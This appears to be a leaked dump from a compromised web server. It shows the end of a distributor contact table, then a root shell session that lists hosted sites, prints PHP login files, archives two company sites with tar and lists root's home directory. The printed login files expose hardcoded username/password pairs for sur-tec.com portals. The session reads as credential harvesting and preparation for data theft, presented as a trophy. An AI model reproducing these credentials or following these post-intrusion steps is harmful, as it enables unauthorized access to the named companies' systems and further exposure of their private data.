  342. | | | 381 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | CT | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  343. | | | 382 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | ME | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  344. | | | 383 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | MA | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  345. | | | 384 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | NH | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  346. | | | 385 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | RI | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  347. | | | 386 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | VT | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  348. | | | 387 | | http://maps.google.com/maps?q=Tactical+%26+Survival+Specialties,+Inc.,+Early+Road,+Harrisonburg,+VA&hl=en&sll=38.423303,-78.888768&sspn=0.090644,0.146942&oq=tactical+%26+survival+specialties+inc+&vpsrc=0&hq=Tactical+%26+Survival+Specialties,+Inc.,&hn | Tactical & Survival Specialties, Inc. | (540) 434-8974 | WV | http://www.tssi-ops.com/ | | | Distributor | 1 | |
  349. | | | 388 | | http://maps.google.com/maps?q=lawmen+supply&hl=en&hq=lawmen+supply&hnear=Egg+Harbor+City,+Atlantic,+New+Jersey&t=m&z=13&vpsrc=0 | Lawmen Supply Company | (609) 965-7307 | DC | http://www.lawmensupply.com/ | | | Distributor | 1 | |
  350. | | | 389 | | http://maps.google.com/maps?q=firing+line+philadelphia&hl=en&hq=firing+line&hnear=Philadelphia,+Pennsylvania&t=m&z=13&vpsrc=0 | Firing Line, Inc | (215) 336-1710 | MD | http://www.firinglineinc.com/ | | | Distributor | 1 | |
  351. | | | 390 | | http://maps.google.com/maps?q=firing+line+philadelphia&hl=en&hq=firing+line&hnear=Philadelphia,+Pennsylvania&t=m&z=13&vpsrc=0 | Firing Line, Inc. | (215) 336-1710 | DE | http://www.firinglineinc.com/ | | | Distributor | 1 | |
  352. | | | 392 | | http://maps.google.com/maps?q=dana+safety+supply&hl=en&hq=dana+safety+supply&hnear=Greensboro,+Guilford,+North+Carolina&t=m&z=12&vpsrc=0 | Dana Safety Supply | (336) 854-5536 | FL | http://www.danasafetysupply.com/ | | | Distributor | 1 | |
  353. | | | 393 | | http://maps.google.com/maps?q=dana+safety+supply&hl=en&hq=dana+safety+supply&hnear=Greensboro,+Guilford,+North+Carolina&t=m&z=12&vpsrc=0 | Dana Safety Supply | (336) 854-5536 | GA | http://www.danasafetysupply.com/ | | | Distributor | 1 | |
  354. | | | 394 | | http://maps.google.com/maps?q=dana+safety+supply&hl=en&hq=dana+safety+supply&hnear=Greensboro,+Guilford,+North+Carolina&t=m&z=12&vpsrc=0 | Dana Safety Supply | (336) 854-5536 | SC | http://www.danasafetysupply.com/ | | | Distributor | 1 | |
  355. | | | 422 | | http://maps.google.com/maps?q=extreme+products&hl=en&sqi=2&hq=extreme+products&radius=15000&t=m&z=16&vpsrc=0 | Extreme Products, LLC | (503) 657-4806 | AK | http://www.extreme-products.net/ | | | Distributor | 1 | |
  356. | | | 396 | | http://maps.google.com/maps?q=omb+guns&hl=en&hq=omb+guns&hnear=Olathe,+Johnson,+Kansas&t=m&z=12&vpsrc=0 | OMB Guns | (913) 322-8412 | IA | http://www.ombguns.com/ | | | Distributor | 1 | |
  357. | | | 397 | | http://maps.google.com/maps?q=omb+guns&hl=en&hq=omb+guns&hnear=Olathe,+Johnson,+Kansas&t=m&z=12&vpsrc=0 | OMB Guns | (913) 322-8412 | MN | http://www.ombguns.com/ | | | Distributor | 1 | |
  358. | | | 398 | | http://maps.google.com/maps?q=omb+guns&hl=en&hq=omb+guns&hnear=Olathe,+Johnson,+Kansas&t=m&z=12&vpsrc=0 | OMB Guns | (913) 322-8412 | MO | http://www.ombguns.com/ | | | Distributor | 1 | |
  359. | | | 399 | | http://maps.google.com/maps?q=omb+guns&hl=en&hq=omb+guns&hnear=Olathe,+Johnson,+Kansas&t=m&z=12&vpsrc=0 | OMB Guns | (913) 322-8412 | NE | http://www.ombguns.com/ | | | Distributor | 1 | |
  360. | | | 400 | | http://maps.google.com/maps?q=srt+supply&hl=en&hq=srt+supply&hnear=St.+Petersburg,+Pinellas,+Florida&t=m&z=12&vpsrc=0 | SRT Supply, Inc. | (727) 526-5451 | GA | http://www.srtsupply.com/ | | | Distributor | 1 | |
  361. | | | 401 | | http://maps.google.com/maps?q=blumenthal+uniforms&hl=en&hq=blumenthal+uniforms&hnear=Portland,+Multnomah,+Oregon&t=m&z=11&vpsrc=0 | Blumenthal Uniforms & Equipment | (503) 452-5055 | ID | http://www.blumenthaluniforms.com/ | | | Distributor | 1 | |
  362. | | | 402 | | http://maps.google.com/maps?q=blumenthal+uniforms&hl=en&hq=blumenthal+uniforms&hnear=Portland,+Multnomah,+Oregon&t=m&z=11&vpsrc=0 | Blumenthal Uniforms & Equipment | (503) 452-5055 | WA | http://www.blumenthaluniforms.com/ | | | Distributor | 1 | |
  363. | | | 403 | | http://maps.google.com/maps?q=kiesler+police+supply&hl=en&hq=kiesler+police+supply&hnear=Jeffersonville,+Clark,+Indiana&t=m&z=12&vpsrc=0 | Kiesler Police Supply, Inc. | (812) 288-5740 | KY | http://www.kiesler.com/ | | | Distributor | 1 | |
  364. | | | 404 | | http://maps.google.com/maps?q=kiesler+supply&hl=en&sqi=2&hq=kiesler+supply&radius=15000&t=m&z=16 | Kiesler Police Supply, Inc. | (812) 288-5740 | OH | http://www.kiesler.com/ | | | Distributor | 1 | |
  365. | | | 405 | | http://maps.google.com/maps?q=gulf+state+distributors+inc&hl=en&hq=gulf+state+distributors+inc&hnear=Montgomery,+Alabama&t=m&z=12&vpsrc=0 | Gulf State Distributors | (334) 271-2011 | LA | http://www.gulfstatesdist.com/ | | | Distributor | 1 | |
  366. | | | 406 | | http://maps.google.com/maps?q=gulf+state+distributors+inc&hl=en&hq=gulf+state+distributors+inc&hnear=Montgomery,+Alabama&t=m&z=12&vpsrc=0 | Gulf States Distributors | (334) 271-2011 () ‎ | MS | http://www.gulfstatesdist.com/ | | | Distributor | 1 | |
  367. | | | 407 | | http://maps.google.com/maps?q=gulf+state+distributors+inc&hl=en&hq=gulf+state+distributors+inc&hnear=Montgomery,+Alabama&t=m&z=12&vpsrc=0&iwloc=A | Gulf States Distributors | (334) 271-2011 () | TN | http://www.gulfstatesdist.com/ | | | Distributor | 1 | |
  368. | | | 408 | | http://maps.google.com/maps?q=advantage+police+supply&hl=en&hq=advantage+police+supply&hnear=Oshkosh,+Winnebago,+Wisconsin&t=m&z=12&vpsrc=0&iwloc=A | Advantage Police Supply | (920) 235-6003 | MN | http://www.advantagepolice-supply.com/Index.htm | | | Distributor | 1 | |
  369. | | | 409 | | http://maps.google.com/maps?q=big+country+supply&hl=en&hq=big+country+supply&hnear=Abilene,+Taylor,+Texas&t=m&z=13&vpsrc=0&iwloc=A | Big Country Supply | (325) 698-1683 | OK | http://www.bigcountrysupply.com/ | | | Distributor | 1 | |
  370. | | | 410 | | http://maps.google.com/maps?q=1105+industry+rd+lexington+ky&hl=en&sqi=2&hnear=1105+Industry+Rd,+Lexington,+Kentucky+40505&t=m&z=16&vpsrc=0 | Buds Police Supply | (859) 368-0417 | TN | http://www.budspolicesupply.com/catalog/index.php | | | Distributor | 1 | |
  371. | | | 411 | | http://maps.google.com/maps?q=combat+cartridge+3042+chevlon+road,+overgaard+az+85933&hl=en&sll=37.0625,-95.677068&sspn=57.249013,134.912109&vpsrc=1&hq=combat+cartridge&hnear=3042+Chevlon+Rd,+Heber-Overgaard,+Navajo,+Arizona+85928&t=m&z=15&iwloc=A | Combat Cartridge | (928) 535-5615 | NM | | | | Distributor | 1 | |
  372. | | | 412 | | http://maps.google.com/maps?q=farm+police+supply&hl=en&hq=farm+police+supply&hnear=Murray,+Salt+Lake,+Utah&t=m&z=14&vpsrc=0&iwloc=A | FARM Police Supply | (801) 313-0802 () ‎ | WY | http://farmpolicesupply.net/ | | | Distributor | 1 | |
  373. | | | 413 | | http://maps.google.com/maps?q=neves+uniforms&hl=en&hq=neves+uniforms&hnear=Denver,+Colorado&t=m&z=12&vpsrc=0 | Neves Uniforms | (303) 455-7000 | NM | http://www.nevesuniforms.com/ | | | Distributor | 1 | |
  374. | | | 414 | | http://maps.google.com/maps?q=neves+uniforms&hl=en&hq=neves+uniforms&hnear=Denver,+Colorado&t=m&z=12&vpsrc=0 | Neves Uniforms | (303) 455-7000 | WY | http://www.nevesuniforms.com/ | | | Distributor | 1 | |
  375. | | | 415 | | | Operator Safety Solutions | (910) 774-9567 | SC | http://ossops.com/index.html | | | Distributor | 1 | |
  376. | | | 416 | | http://maps.google.com/maps?q=ray+o\'herron+co&hl=en&hq=ray+o\'herron+co&hnear=Danville,+Vermilion,+Illinois&t=m&z=12&vpsrc=0 | Ray OHerron Co., Inc. | (800) 223-2097 | MN | http://www.oherron.com/ | | | Distributor | 1 | |
  377. | | | 417 | | http://maps.google.com/maps?q=ray+o\'herron+co&hl=en&hq=ray+o\'herron+co&hnear=Danville,+Vermilion,+Illinois&t=m&z=12&vpsrc=0 | Ray OHerron Co., Inc. | (800( 223-2097 | ND | http://www.oherron.com/ | | | Distributor | 1 | |
  378. | | | 418 | | http://maps.google.com/maps?q=ray+o\'herron+co&hl=en&hq=ray+o\'herron+co&hnear=Danville,+Vermilion,+Illinois&t=m&z=12&vpsrc=0 | Ray OHerron, Co., Inc. | (800) 223-2097 | SD | http://www.oherron.com/ | | | Distributor | 1 | |
  379. | | | 419 | | http://maps.google.com/maps?q=shore+galleries&hl=en&hq=shore+galleries&hnear=Lincolnwood,+Cook,+Illinois&t=m&z=14&vpsrc=0 | Shore Galleries | (847) 676-2900 | MN | http://www.shoregalleries.com/ | | | Distributor | 1 | |
  380. | | | 420 | | http://maps.google.com/maps?q=southern+police+equipment&hl=en&hq=southern+police+equipment&hnear=Richmond,+Virginia&t=m&z=12&vpsrc=0 | Southern Police Equipment | (800) 542-5243 | WV | http://www.southernpoliceequipment.com/ | | | Distributor | 1 | |
  381. | | | 421 | | http://maps.google.com/maps?q=all+state+police+equipment&hl=en&hq=all+state+police+equipment&hnear=Pomona,+Los+Angeles,+California&t=m&z=12&vpsrc=0 | All State Police Equipment, Co. | (800) 582-2294 | NV | http://www.allstatepolice.com/ | | | Distributor | 1 | |
  382. | | | 428 | | http://maps.google.com/maps?q=ray+o\'herron&hl=en&sqi=2&hq=ray+o\'herron&hnear=Lombard,+DuPage,+Illinois&t=m&z=13 | Ray OHerron Co., Inc. | | IA | http://www.oherron.com/ | | | Distributor | 1 | |
  383. +-----------------------------------+-----------------+----------+-----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------+------------------------+-------+-----------------------------------------------------------------------------------------------------+-----------------------+----------+-------------+----------+------------------+
  384.  
  385. # ls -al /var/www/vhosts
  386. total 180
  387. drwxrwxr-x 41 ftp ftp 4096 Feb 8 14:30 .
  388. drwxr-xr-x 11 ftp ftp 4096 Aug 20 11:57 ..
  389. -rwxrwxr-x 1 ftp ftp 90 Jun 17 2008 .htaccess
  390. -rwxr-xr-x 1 ftp ftp 81 Feb 16 2010 .samplehtaccess
  391. lrwxrwxrwx 1 ftp ftp 18 Sep 28 2009 69.30.233.88 -> www.yinrunning.com
  392. lrwxrwxrwx 1 ftp ftp 15 Nov 29 11:16 aeoniun.com -> www.aeoniun.com
  393. lrwxrwxrwx 1 ftp ftp 25 May 11 2011 alittlebirdbizdev.com -> www.alittlebirdbizdev.com
  394. drwxrwxrwx 4 ftp ftp 4096 Oct 23 2010 bak_SLS_10_23_2010
  395. drwxrwxrwx 6 ftp ftp 4096 Mar 3 2010 bo.tensquirrel.com
  396. lrwxrwxrwx 1 ftp ftp 23 Mar 25 2010 cambridgechurch.org -> www.cambridgechurch.org
  397. lrwxrwxrwx 1 ftp ftp 12 Apr 4 2011 cbts.edu -> www.cbts.edu
  398. lrwxrwxrwx 1 ftp ftp 29 Apr 5 2011 clinicalrisksolutions.com -> www.clinicalrisksolutions.com
  399. lrwxrwxrwx 1 ftp ftp 23 Sep 15 17:24 combinedsystems.com -> www.combinedsystems.com
  400. lrwxrwxrwx 1 ftp ftp 19 Apr 26 2009 cragarwheel.com -> www.cragarwheel.com
  401. lrwxrwxrwx 1 ftp ftp 29 Sep 22 2010 crs.tensquirrel.com -> www.clinicalrisksolutions.com
  402. lrwxrwxrwx 1 ftp ftp 23 Sep 17 00:28 csi.markbranding.com -> www.combinedsystems.com
  403. lrwxrwxrwx 1 ftp ftp 18 Apr 5 2011 dealers.dioaccessories.com -> dealers.gstdio.com
  404. drwxrwxrwx 4 ftp ftp 4096 Mar 15 2010 dealers.gstdio.com
  405. lrwxrwxrwx 1 ftp ftp 18 Aug 22 19:11 devin.tensquirrel.com -> www.devinwolfe.com
  406. lrwxrwxrwx 1 ftp ftp 18 Aug 22 19:11 devinwolfe.com -> www.devinwolfe.com
  407. lrwxrwxrwx 1 ftp ftp 14 Mar 10 2010 dioaccessories.com -> www.gstdio.com
  408. lrwxrwxrwx 1 ftp ftp 13 Mar 28 2011 dmi.tensquirrel.com -> www.dmikc.com
  409. lrwxrwxrwx 1 ftp ftp 13 Mar 28 2011 dmifloors.com -> www.dmikc.com
  410. lrwxrwxrwx 1 ftp ftp 13 Apr 5 2011 dmikc.com -> www.dmikc.com
  411. drwxrwxrwx 4 ftp ftp 4096 Jul 1 2010 dns.tensquirrel.com
  412. lrwxrwxrwx 1 ftp ftp 20 Dec 10 2010 dsto.markbranding.com -> dsto.tensquirrel.com
  413. drwxrwxrwx 4 ftp ftp 4096 Dec 10 2010 dsto.tensquirrel.com
  414. lrwxrwxrwx 1 ftp ftp 14 Apr 5 2011 gstdio.com -> www.gstdio.com
  415. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 handcuffsusa.com -> www.combinedsystems.com
  416. lrwxrwxrwx 1 ftp ftp 23 Jul 17 2009 hawleywoodfilms.com -> www.hawleywoodfilms.com
  417. drwxrwxrwx 4 ftp ftp 4096 Apr 8 2011 kwotez.tensquirrel.com
  418. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 less-lethal.com -> www.combinedsystems.com
  419. lrwxrwxrwx 1 ftp ftp 25 May 11 2011 lilbird.tensquirrel.com -> www.alittlebirdbizdev.com
  420. drwxr-xr-x 2 ftp ftp 4096 Aug 20 11:59 mail.tensquirrel.com
  421. lrwxrwxrwx 1 ftp ftp 20 Nov 14 18:16 markbranding.com -> www.markbranding.com
  422. lrwxrwxrwx 1 ftp ftp 17 Apr 15 2011 mehtaphor.com -> www.mehtaphor.com
  423. lrwxrwxrwx 1 ftp ftp 17 Apr 15 2011 mehtaphor.tensquirrel.com -> www.mehtaphor.com
  424. lrwxrwxrwx 1 ftp ftp 23 Apr 15 2011 milcahsolutions.com -> www.milcahsolutions.com
  425. lrwxrwxrwx 1 ftp ftp 23 Apr 15 2011 milcahsolutions.tensquirrel.com -> www.milcahsolutions.com
  426. lrwxrwxrwx 1 ftp ftp 22 Jul 10 2008 milesincdesign.com -> www.milesincdesign.com
  427. drwxrwxrwx 3 ftp ftp 4096 Apr 4 2011 mysql.tensquirrel.com
  428. -rwxrwx--- 1 ftp ftp 466 Apr 5 2011 new
  429. drwxr-xr-x 4 ftp ftp 4096 Apr 20 2010 new.markbranding.com
  430. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 pennarms.com -> www.combinedsystems.com
  431. lrwxrwxrwx 1 ftp ftp 21 Mar 16 2010 petitepawsbnb.com -> www.petitepawsbnb.com
  432. lrwxrwxrwx 1 ftp ftp 18 Sep 17 11:40 plusovella.com -> www.plusovella.com
  433. lrwxrwxrwx 1 ftp ftp 31 Apr 5 2011 signlanguagespecialists.com -> www.signlanguagespecialists.com
  434. drwxrwxrwx 4 ftp ftp 4096 Jun 16 2010 sls.tensquirrel.com
  435. lrwxrwxrwx 1 ftp ftp 19 Oct 5 2010 sls.yinrunning.com -> sls.tensquirrel.com
  436. drwxr-xr-x 4 ftp ftp 4096 Oct 14 2009 squirrel.tensquirrel.com
  437. lrwxrwxrwx 1 ftp ftp 29 Nov 2 2009 sumrallcommunications.com -> www.sumrallcommunications.com
  438. lrwxrwxrwx 1 ftp ftp 15 Apr 5 2011 sur-tec.com -> www.sur-tec.com
  439. lrwxrwxrwx 1 ftp ftp 15 Mar 26 2011 surtec.markbranding.com -> www.sur-tec.com
  440. lrwxrwxrwx 1 ftp ftp 19 Sep 29 2009 tensquirrel.com -> www.tensquirrel.com
  441. -rwxrwxrwx 1 ftp ftp 1 Mar 16 2010 txt.txt
  442. drwxrwxrwx 4 ftp ftp 4096 Feb 8 14:30 voltage.tensquirrel.com
  443. drwxrwxrwx 4 ftp ftp 4096 May 17 2010 webmail.tensquirrel.com
  444. drwxrwxrwx 5 ftp ftp 4096 Jun 16 2011 work.yinrunning.com
  445. drwxr-xr-x 4 ftp ftp 4096 Nov 2 14:04 workshop.tensquirrel.com
  446. drwxrwxrwx 4 ftp ftp 4096 Nov 29 11:16 www.aeoniun.com
  447. drwxrwxrwx 4 ftp ftp 4096 May 11 2011 www.alittlebirdbizdev.com
  448. drwxrwxrwx 4 ftp ftp 4096 Sep 6 10:49 www.cambridgechurch.org
  449. drwxrwxrwx 4 ftp ftp 4096 Sep 2 2009 www.cambridgechurch.org~
  450. drwxrwxrwx 4 ftp ftp 4096 May 9 2011 www.cbts.edu
  451. drwxrwxrwx 4 ftp ftp 4096 Sep 22 2010 www.clinicalrisksolutions.com
  452. drwxrwxrwx 4 ftp ftp 4096 Feb 10 18:54 www.combinedsystems.com
  453. drwxrwxrwx 4 ftp ftp 4096 Jul 6 2009 www.cragarwheel.com
  454. drwxrwxrwx 4 ftp ftp 4096 Aug 22 19:11 www.devinwolfe.com
  455. lrwxrwxrwx 1 ftp ftp 14 Mar 10 2010 www.dioaccessories.com -> www.gstdio.com
  456. lrwxrwxrwx 1 ftp ftp 13 Mar 28 2011 www.dmifloors.com -> www.dmikc.com
  457. drwxrwxrwx 4 ftp ftp 4096 Mar 28 2011 www.dmikc.com
  458. drwxrwxrwx 4 ftp ftp 4096 Mar 10 2010 www.gstdio.com
  459. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 www.handcuffsusa.com -> www.combinedsystems.com
  460. drwxrwxrwx 4 ftp ftp 4096 Jan 28 2010 www.hawleywoodfilms.com
  461. drwxrwxrwx 5 ftp ftp 4096 Nov 11 2009 www.hawleywoodfilms.com~
  462. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 www.less-lethal.com -> www.combinedsystems.com
  463. drwxrwxrwx 4 ftp ftp 4096 Oct 1 13:47 www.markbranding.com
  464. drwxrwxrwx 4 ftp ftp 4096 Apr 15 2011 www.mehtaphor.com
  465. drwxrwxrwx 4 ftp ftp 4096 Apr 15 2011 www.milcahsolutions.com
  466. drwxrwxrwx 3 ftp ftp 4096 Feb 14 2009 www.milesincdesign.com
  467. lrwxrwxrwx 1 ftp ftp 23 Jan 13 16:50 www.pennarms.com -> www.combinedsystems.com
  468. drwxrwxrwx 4 ftp ftp 4096 Mar 16 2010 www.petitepawsbnb.com
  469. drwxrwxrwx 4 ftp ftp 4096 Sep 17 11:40 www.plusovella.com
  470. drwxrwxrwx 4 ftp ftp 4096 Jun 16 2010 www.signlanguagespecialists.com
  471. drwxrwxrwx 4 ftp ftp 4096 Oct 30 2009 www.sumrallcommunications.com
  472. drwxrwxrwx 4 ftp ftp 4096 Oct 12 18:04 www.sur-tec.com
  473. drwxr-xr-x 4 ftp ftp 4096 Mar 1 2010 www.tensquirrel.com
  474. drwxrwxrwx 5 ftp ftp 4096 Jun 18 2009 www.yinrunning.com
  475. lrwxrwxrwx 1 ftp ftp 18 Jun 4 2008 yinrunning.com -> www.yinrunning.com
  476.  
  477. # cd /var/www/vhosts/combinedsystems.com/docroot; ls -al
  478. total 164
  479. drwxrwxrwx 23 ftp ftp 4096 Feb 13 19:57 .
  480. drwxrwxrwx 4 ftp ftp 4096 Feb 10 18:54 ..
  481. -rwxrwxrwx 1 ftp ftp 95 Sep 15 17:24 .htaccess
  482. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:52 _css
  483. drwxr-xr-x 3 ftp ftp 4096 Jan 13 10:46 _img
  484. drwxr-xr-x 3 ftp ftp 4096 Sep 16 15:53 _inc~
  485. drwxr-xr-x 3 ftp ftp 4096 Sep 16 15:53 _js
  486. drwxrwxr-x 4 ftp ftp 4096 Feb 10 12:12 _pdf
  487. drwxr-xr-x 2 ftp ftp 4096 Oct 31 11:11 cart
  488. -rw-r--r-- 1 ftp ftp 6690 Jan 11 13:09 categories.php
  489. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:54 categories~
  490. drwxr-xr-x 15 ftp ftp 4096 Feb 13 17:52 cc
  491. -rw-r--r-- 1 ftp ftp 196 Dec 22 15:23 comingsoon.php
  492. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 contact
  493. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 content
  494. -rw-r--r-- 1 ftp ftp 5957 Dec 22 15:15 createAccount.form.php~
  495. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 distributors
  496. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 download
  497. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 events
  498. drwxr-xr-x 4 ftp ftp 4096 Sep 16 15:58 fancybox~
  499. -rw-r--r-- 1 ftp ftp 0 Sep 16 15:52 favicon.ico
  500. -rw-r--r-- 1 ftp ftp 14003 Dec 22 15:31 findDistributor.php~
  501. -rw-r--r-- 1 ftp ftp 2487 Jan 12 13:54 index.php
  502. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 login
  503. -rw-r--r-- 1 ftp ftp 2434 Jan 11 13:14 login.form.php
  504. drwxr-xr-x 2 ftp ftp 4096 Oct 31 11:13 myaccount
  505. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 news
  506. -rw-r--r-- 1 ftp ftp 24 Dec 26 18:56 phpInfo.php
  507. -rw-r--r-- 1 ftp ftp 3339 Jan 5 15:25 productDetail.php
  508. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 products
  509. drwxr-xr-x 2 ftp ftp 4096 Jan 5 16:18 quote
  510. -rw-r--r-- 1 ftp ftp 6863 Jan 18 12:32 requestAccount.form.php
  511. -rw-r--r-- 1 ftp ftp 2112 Jan 6 14:48 resetPW.form.php
  512. -rw-r--r-- 1 ftp ftp 29 Feb 13 19:57 robots.txt
  513. drwxr-xr-x 2 ftp ftp 4096 Sep 16 15:58 search
  514. drwxr-xr-x 2 ftp ftp 4096 Jan 10 10:36 training
  515.  
  516. # cd /var/www/vhosts/sur-tec.com/docroot; ls -al
  517. total 164
  518. drwxrwxrwx 33 ftp ftp 4096 Feb 10 18:59 .
  519. drwxrwxrwx 4 ftp ftp 4096 Oct 12 18:04 ..
  520. -rwxrwxrwx 1 ftp ftp 87 Mar 26 2011 .htaccess
  521. drwxr-xr-x 6 ftp ftp 4096 May 1 2011 NOT-ME
  522. drwxr-xr-x 2 ftp ftp 4096 Apr 6 2011 _css
  523. drwxr-xr-x 9 ftp ftp 4096 Jul 16 2011 _img
  524. drwxr-xr-x 2 ftp ftp 4096 Mar 1 2011 _js
  525. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 _pdf
  526. drwxr-xr-x 3 ftp ftp 4096 Jun 2 2011 _swf
  527. -rw-r--r-- 1 ftp ftp 9143 Oct 3 11:41 access-request.php
  528. drwxr-xr-x 2 ftp ftp 4096 Jul 16 2011 cameras
  529. drwxr-xr-x 2 ftp ftp 4096 Mar 23 2011 company
  530. drwxr-xr-x 2 ftp ftp 4096 Jan 5 2011 content-to-sort
  531. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 datalauncher
  532. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 datalauncher-e
  533. drwxr-xr-x 2 ftp ftp 4096 Jul 16 2011 enclosures
  534. drwxr-xr-x 2 ftp ftp 4096 Mar 21 2011 exhibit-schedule
  535. -rw-r--r-- 1 ftp ftp 1406 Jan 5 2011 favicon.ico
  536. drwxr-xr-x 2 ftp ftp 4096 Jul 6 2011 home
  537. -rw-r--r-- 1 ftp ftp 1955 Jun 2 2011 index.php
  538. -rw-r--r-- 1 ftp ftp 326 Oct 19 12:17 login.php
  539. -rw-r--r-- 1 ftp ftp 305 Oct 20 08:44 login_sprint.php
  540. drwxr-xr-x 2 ftp ftp 4096 Mar 7 2011 mvss
  541. drwxr-xr-x 2 ftp ftp 4096 Apr 2 2011 request
  542. drwxr-xr-x 2 ftp ftp 4096 Oct 20 10:16 sprint
  543. drwxr-xr-x 3 ftp ftp 4096 Mar 27 2011 support
  544. drwxr-xr-x 2 ftp ftp 4096 Mar 29 2011 vantage
  545. drwxr-xr-x 2 ftp ftp 4096 Apr 30 2011 vp-alliance
  546. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 vp-android
  547. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 vp-avg
  548. drwxr-xr-x 2 ftp ftp 4096 Apr 30 2011 vp-enterprise-server
  549. drwxr-xr-x 2 ftp ftp 4096 Jul 15 2011 vp-insider
  550. drwxr-xr-x 2 ftp ftp 4096 May 9 2011 vp-mobile
  551. drwxr-xr-x 2 ftp ftp 4096 Apr 30 2011 vp-pes
  552. drwxr-xr-x 2 ftp ftp 4096 Apr 30 2011 vp-server-standard
  553. drwxr-xr-x 2 ftp ftp 4096 May 9 2011 vpmobile
  554. drwxr-xr-x 2 ftp ftp 4096 May 20 2011 vpserveractivation
  555. drwxr-xr-x 2 ftp ftp 4096 Feb 27 2011 wireless
  556. drwxr-xr-x 2 ftp ftp 4096 Mar 23 2011 xoa
  557.  
  558. # cat login.php
  559. <?php
  560.  
  561. $skip_check = true;
  562. $SKIP_OUPUT = true;
  563. include( "header.php" );
  564.  
  565.  
  566.  
  567. if ( ( $username == "gov" && $password == "government" ) || ( $username == "vpline" && $password == "covertops" ) ) {
  568. $admin->setSession();
  569. header( "Location: /home/" );
  570. exit;
  571. }
  572. else {
  573. header( "Location: /" );
  574. exit;
  575. }
  576. ?>
  577.  
  578. # cat login_sprint.php
  579. <?php
  580. ob_start();
  581. $skip_check = true;
  582. $SKIP_OUTPUT = false;
  583. include( "header.php" );
  584.  
  585. if ( $username == "sprint" && $password == "publicsector" ) {
  586. $admin->setSession();
  587. header( "Location: /sprint/downloads.php" );
  588. exit;
  589. }
  590. else {
  591. header( "Location: /sprint/" );
  592. exit;
  593. }
  594. ?>
  595.  
  596. # cat vpserveractivation/index.php
  597. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  598. <html xmlns="http://www.w3.org/1999/xhtml">
  599. <head>
  600. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  601. <meta http-equiv="refresh" content="0;url=https://surtec.smithresearchsolutions.com/VP/Public/vpServerDownload/publish.htm">
  602. <title>Untitled Document</title>
  603. </head>
  604.  
  605. <body>
  606. </body>
  607. </html>
  608.  
  609. # cd /var/www/vhosts;
  610.  
  611. # tar -czf sur-tec.tar.gz sur-tec.com &
  612.  
  613. # tar -czf csi.tar.gz combinedsystems.com &
  614.  
  615. # cd ~root; ls -al
  616. total 228
  617. drwx------ 8 root root 4096 Aug 20 16:06 .
  618. drwxr-xr-x 19 root root 4096 Apr 17 2008 ..
  619. -rw------- 1 root root 10300 Feb 10 23:58 .bash_history
  620. -rw-r--r-- 1 root root 0 Apr 19 2007 .keep
  621. -rw------- 1 root root 35 May 10 2008 .lesshst
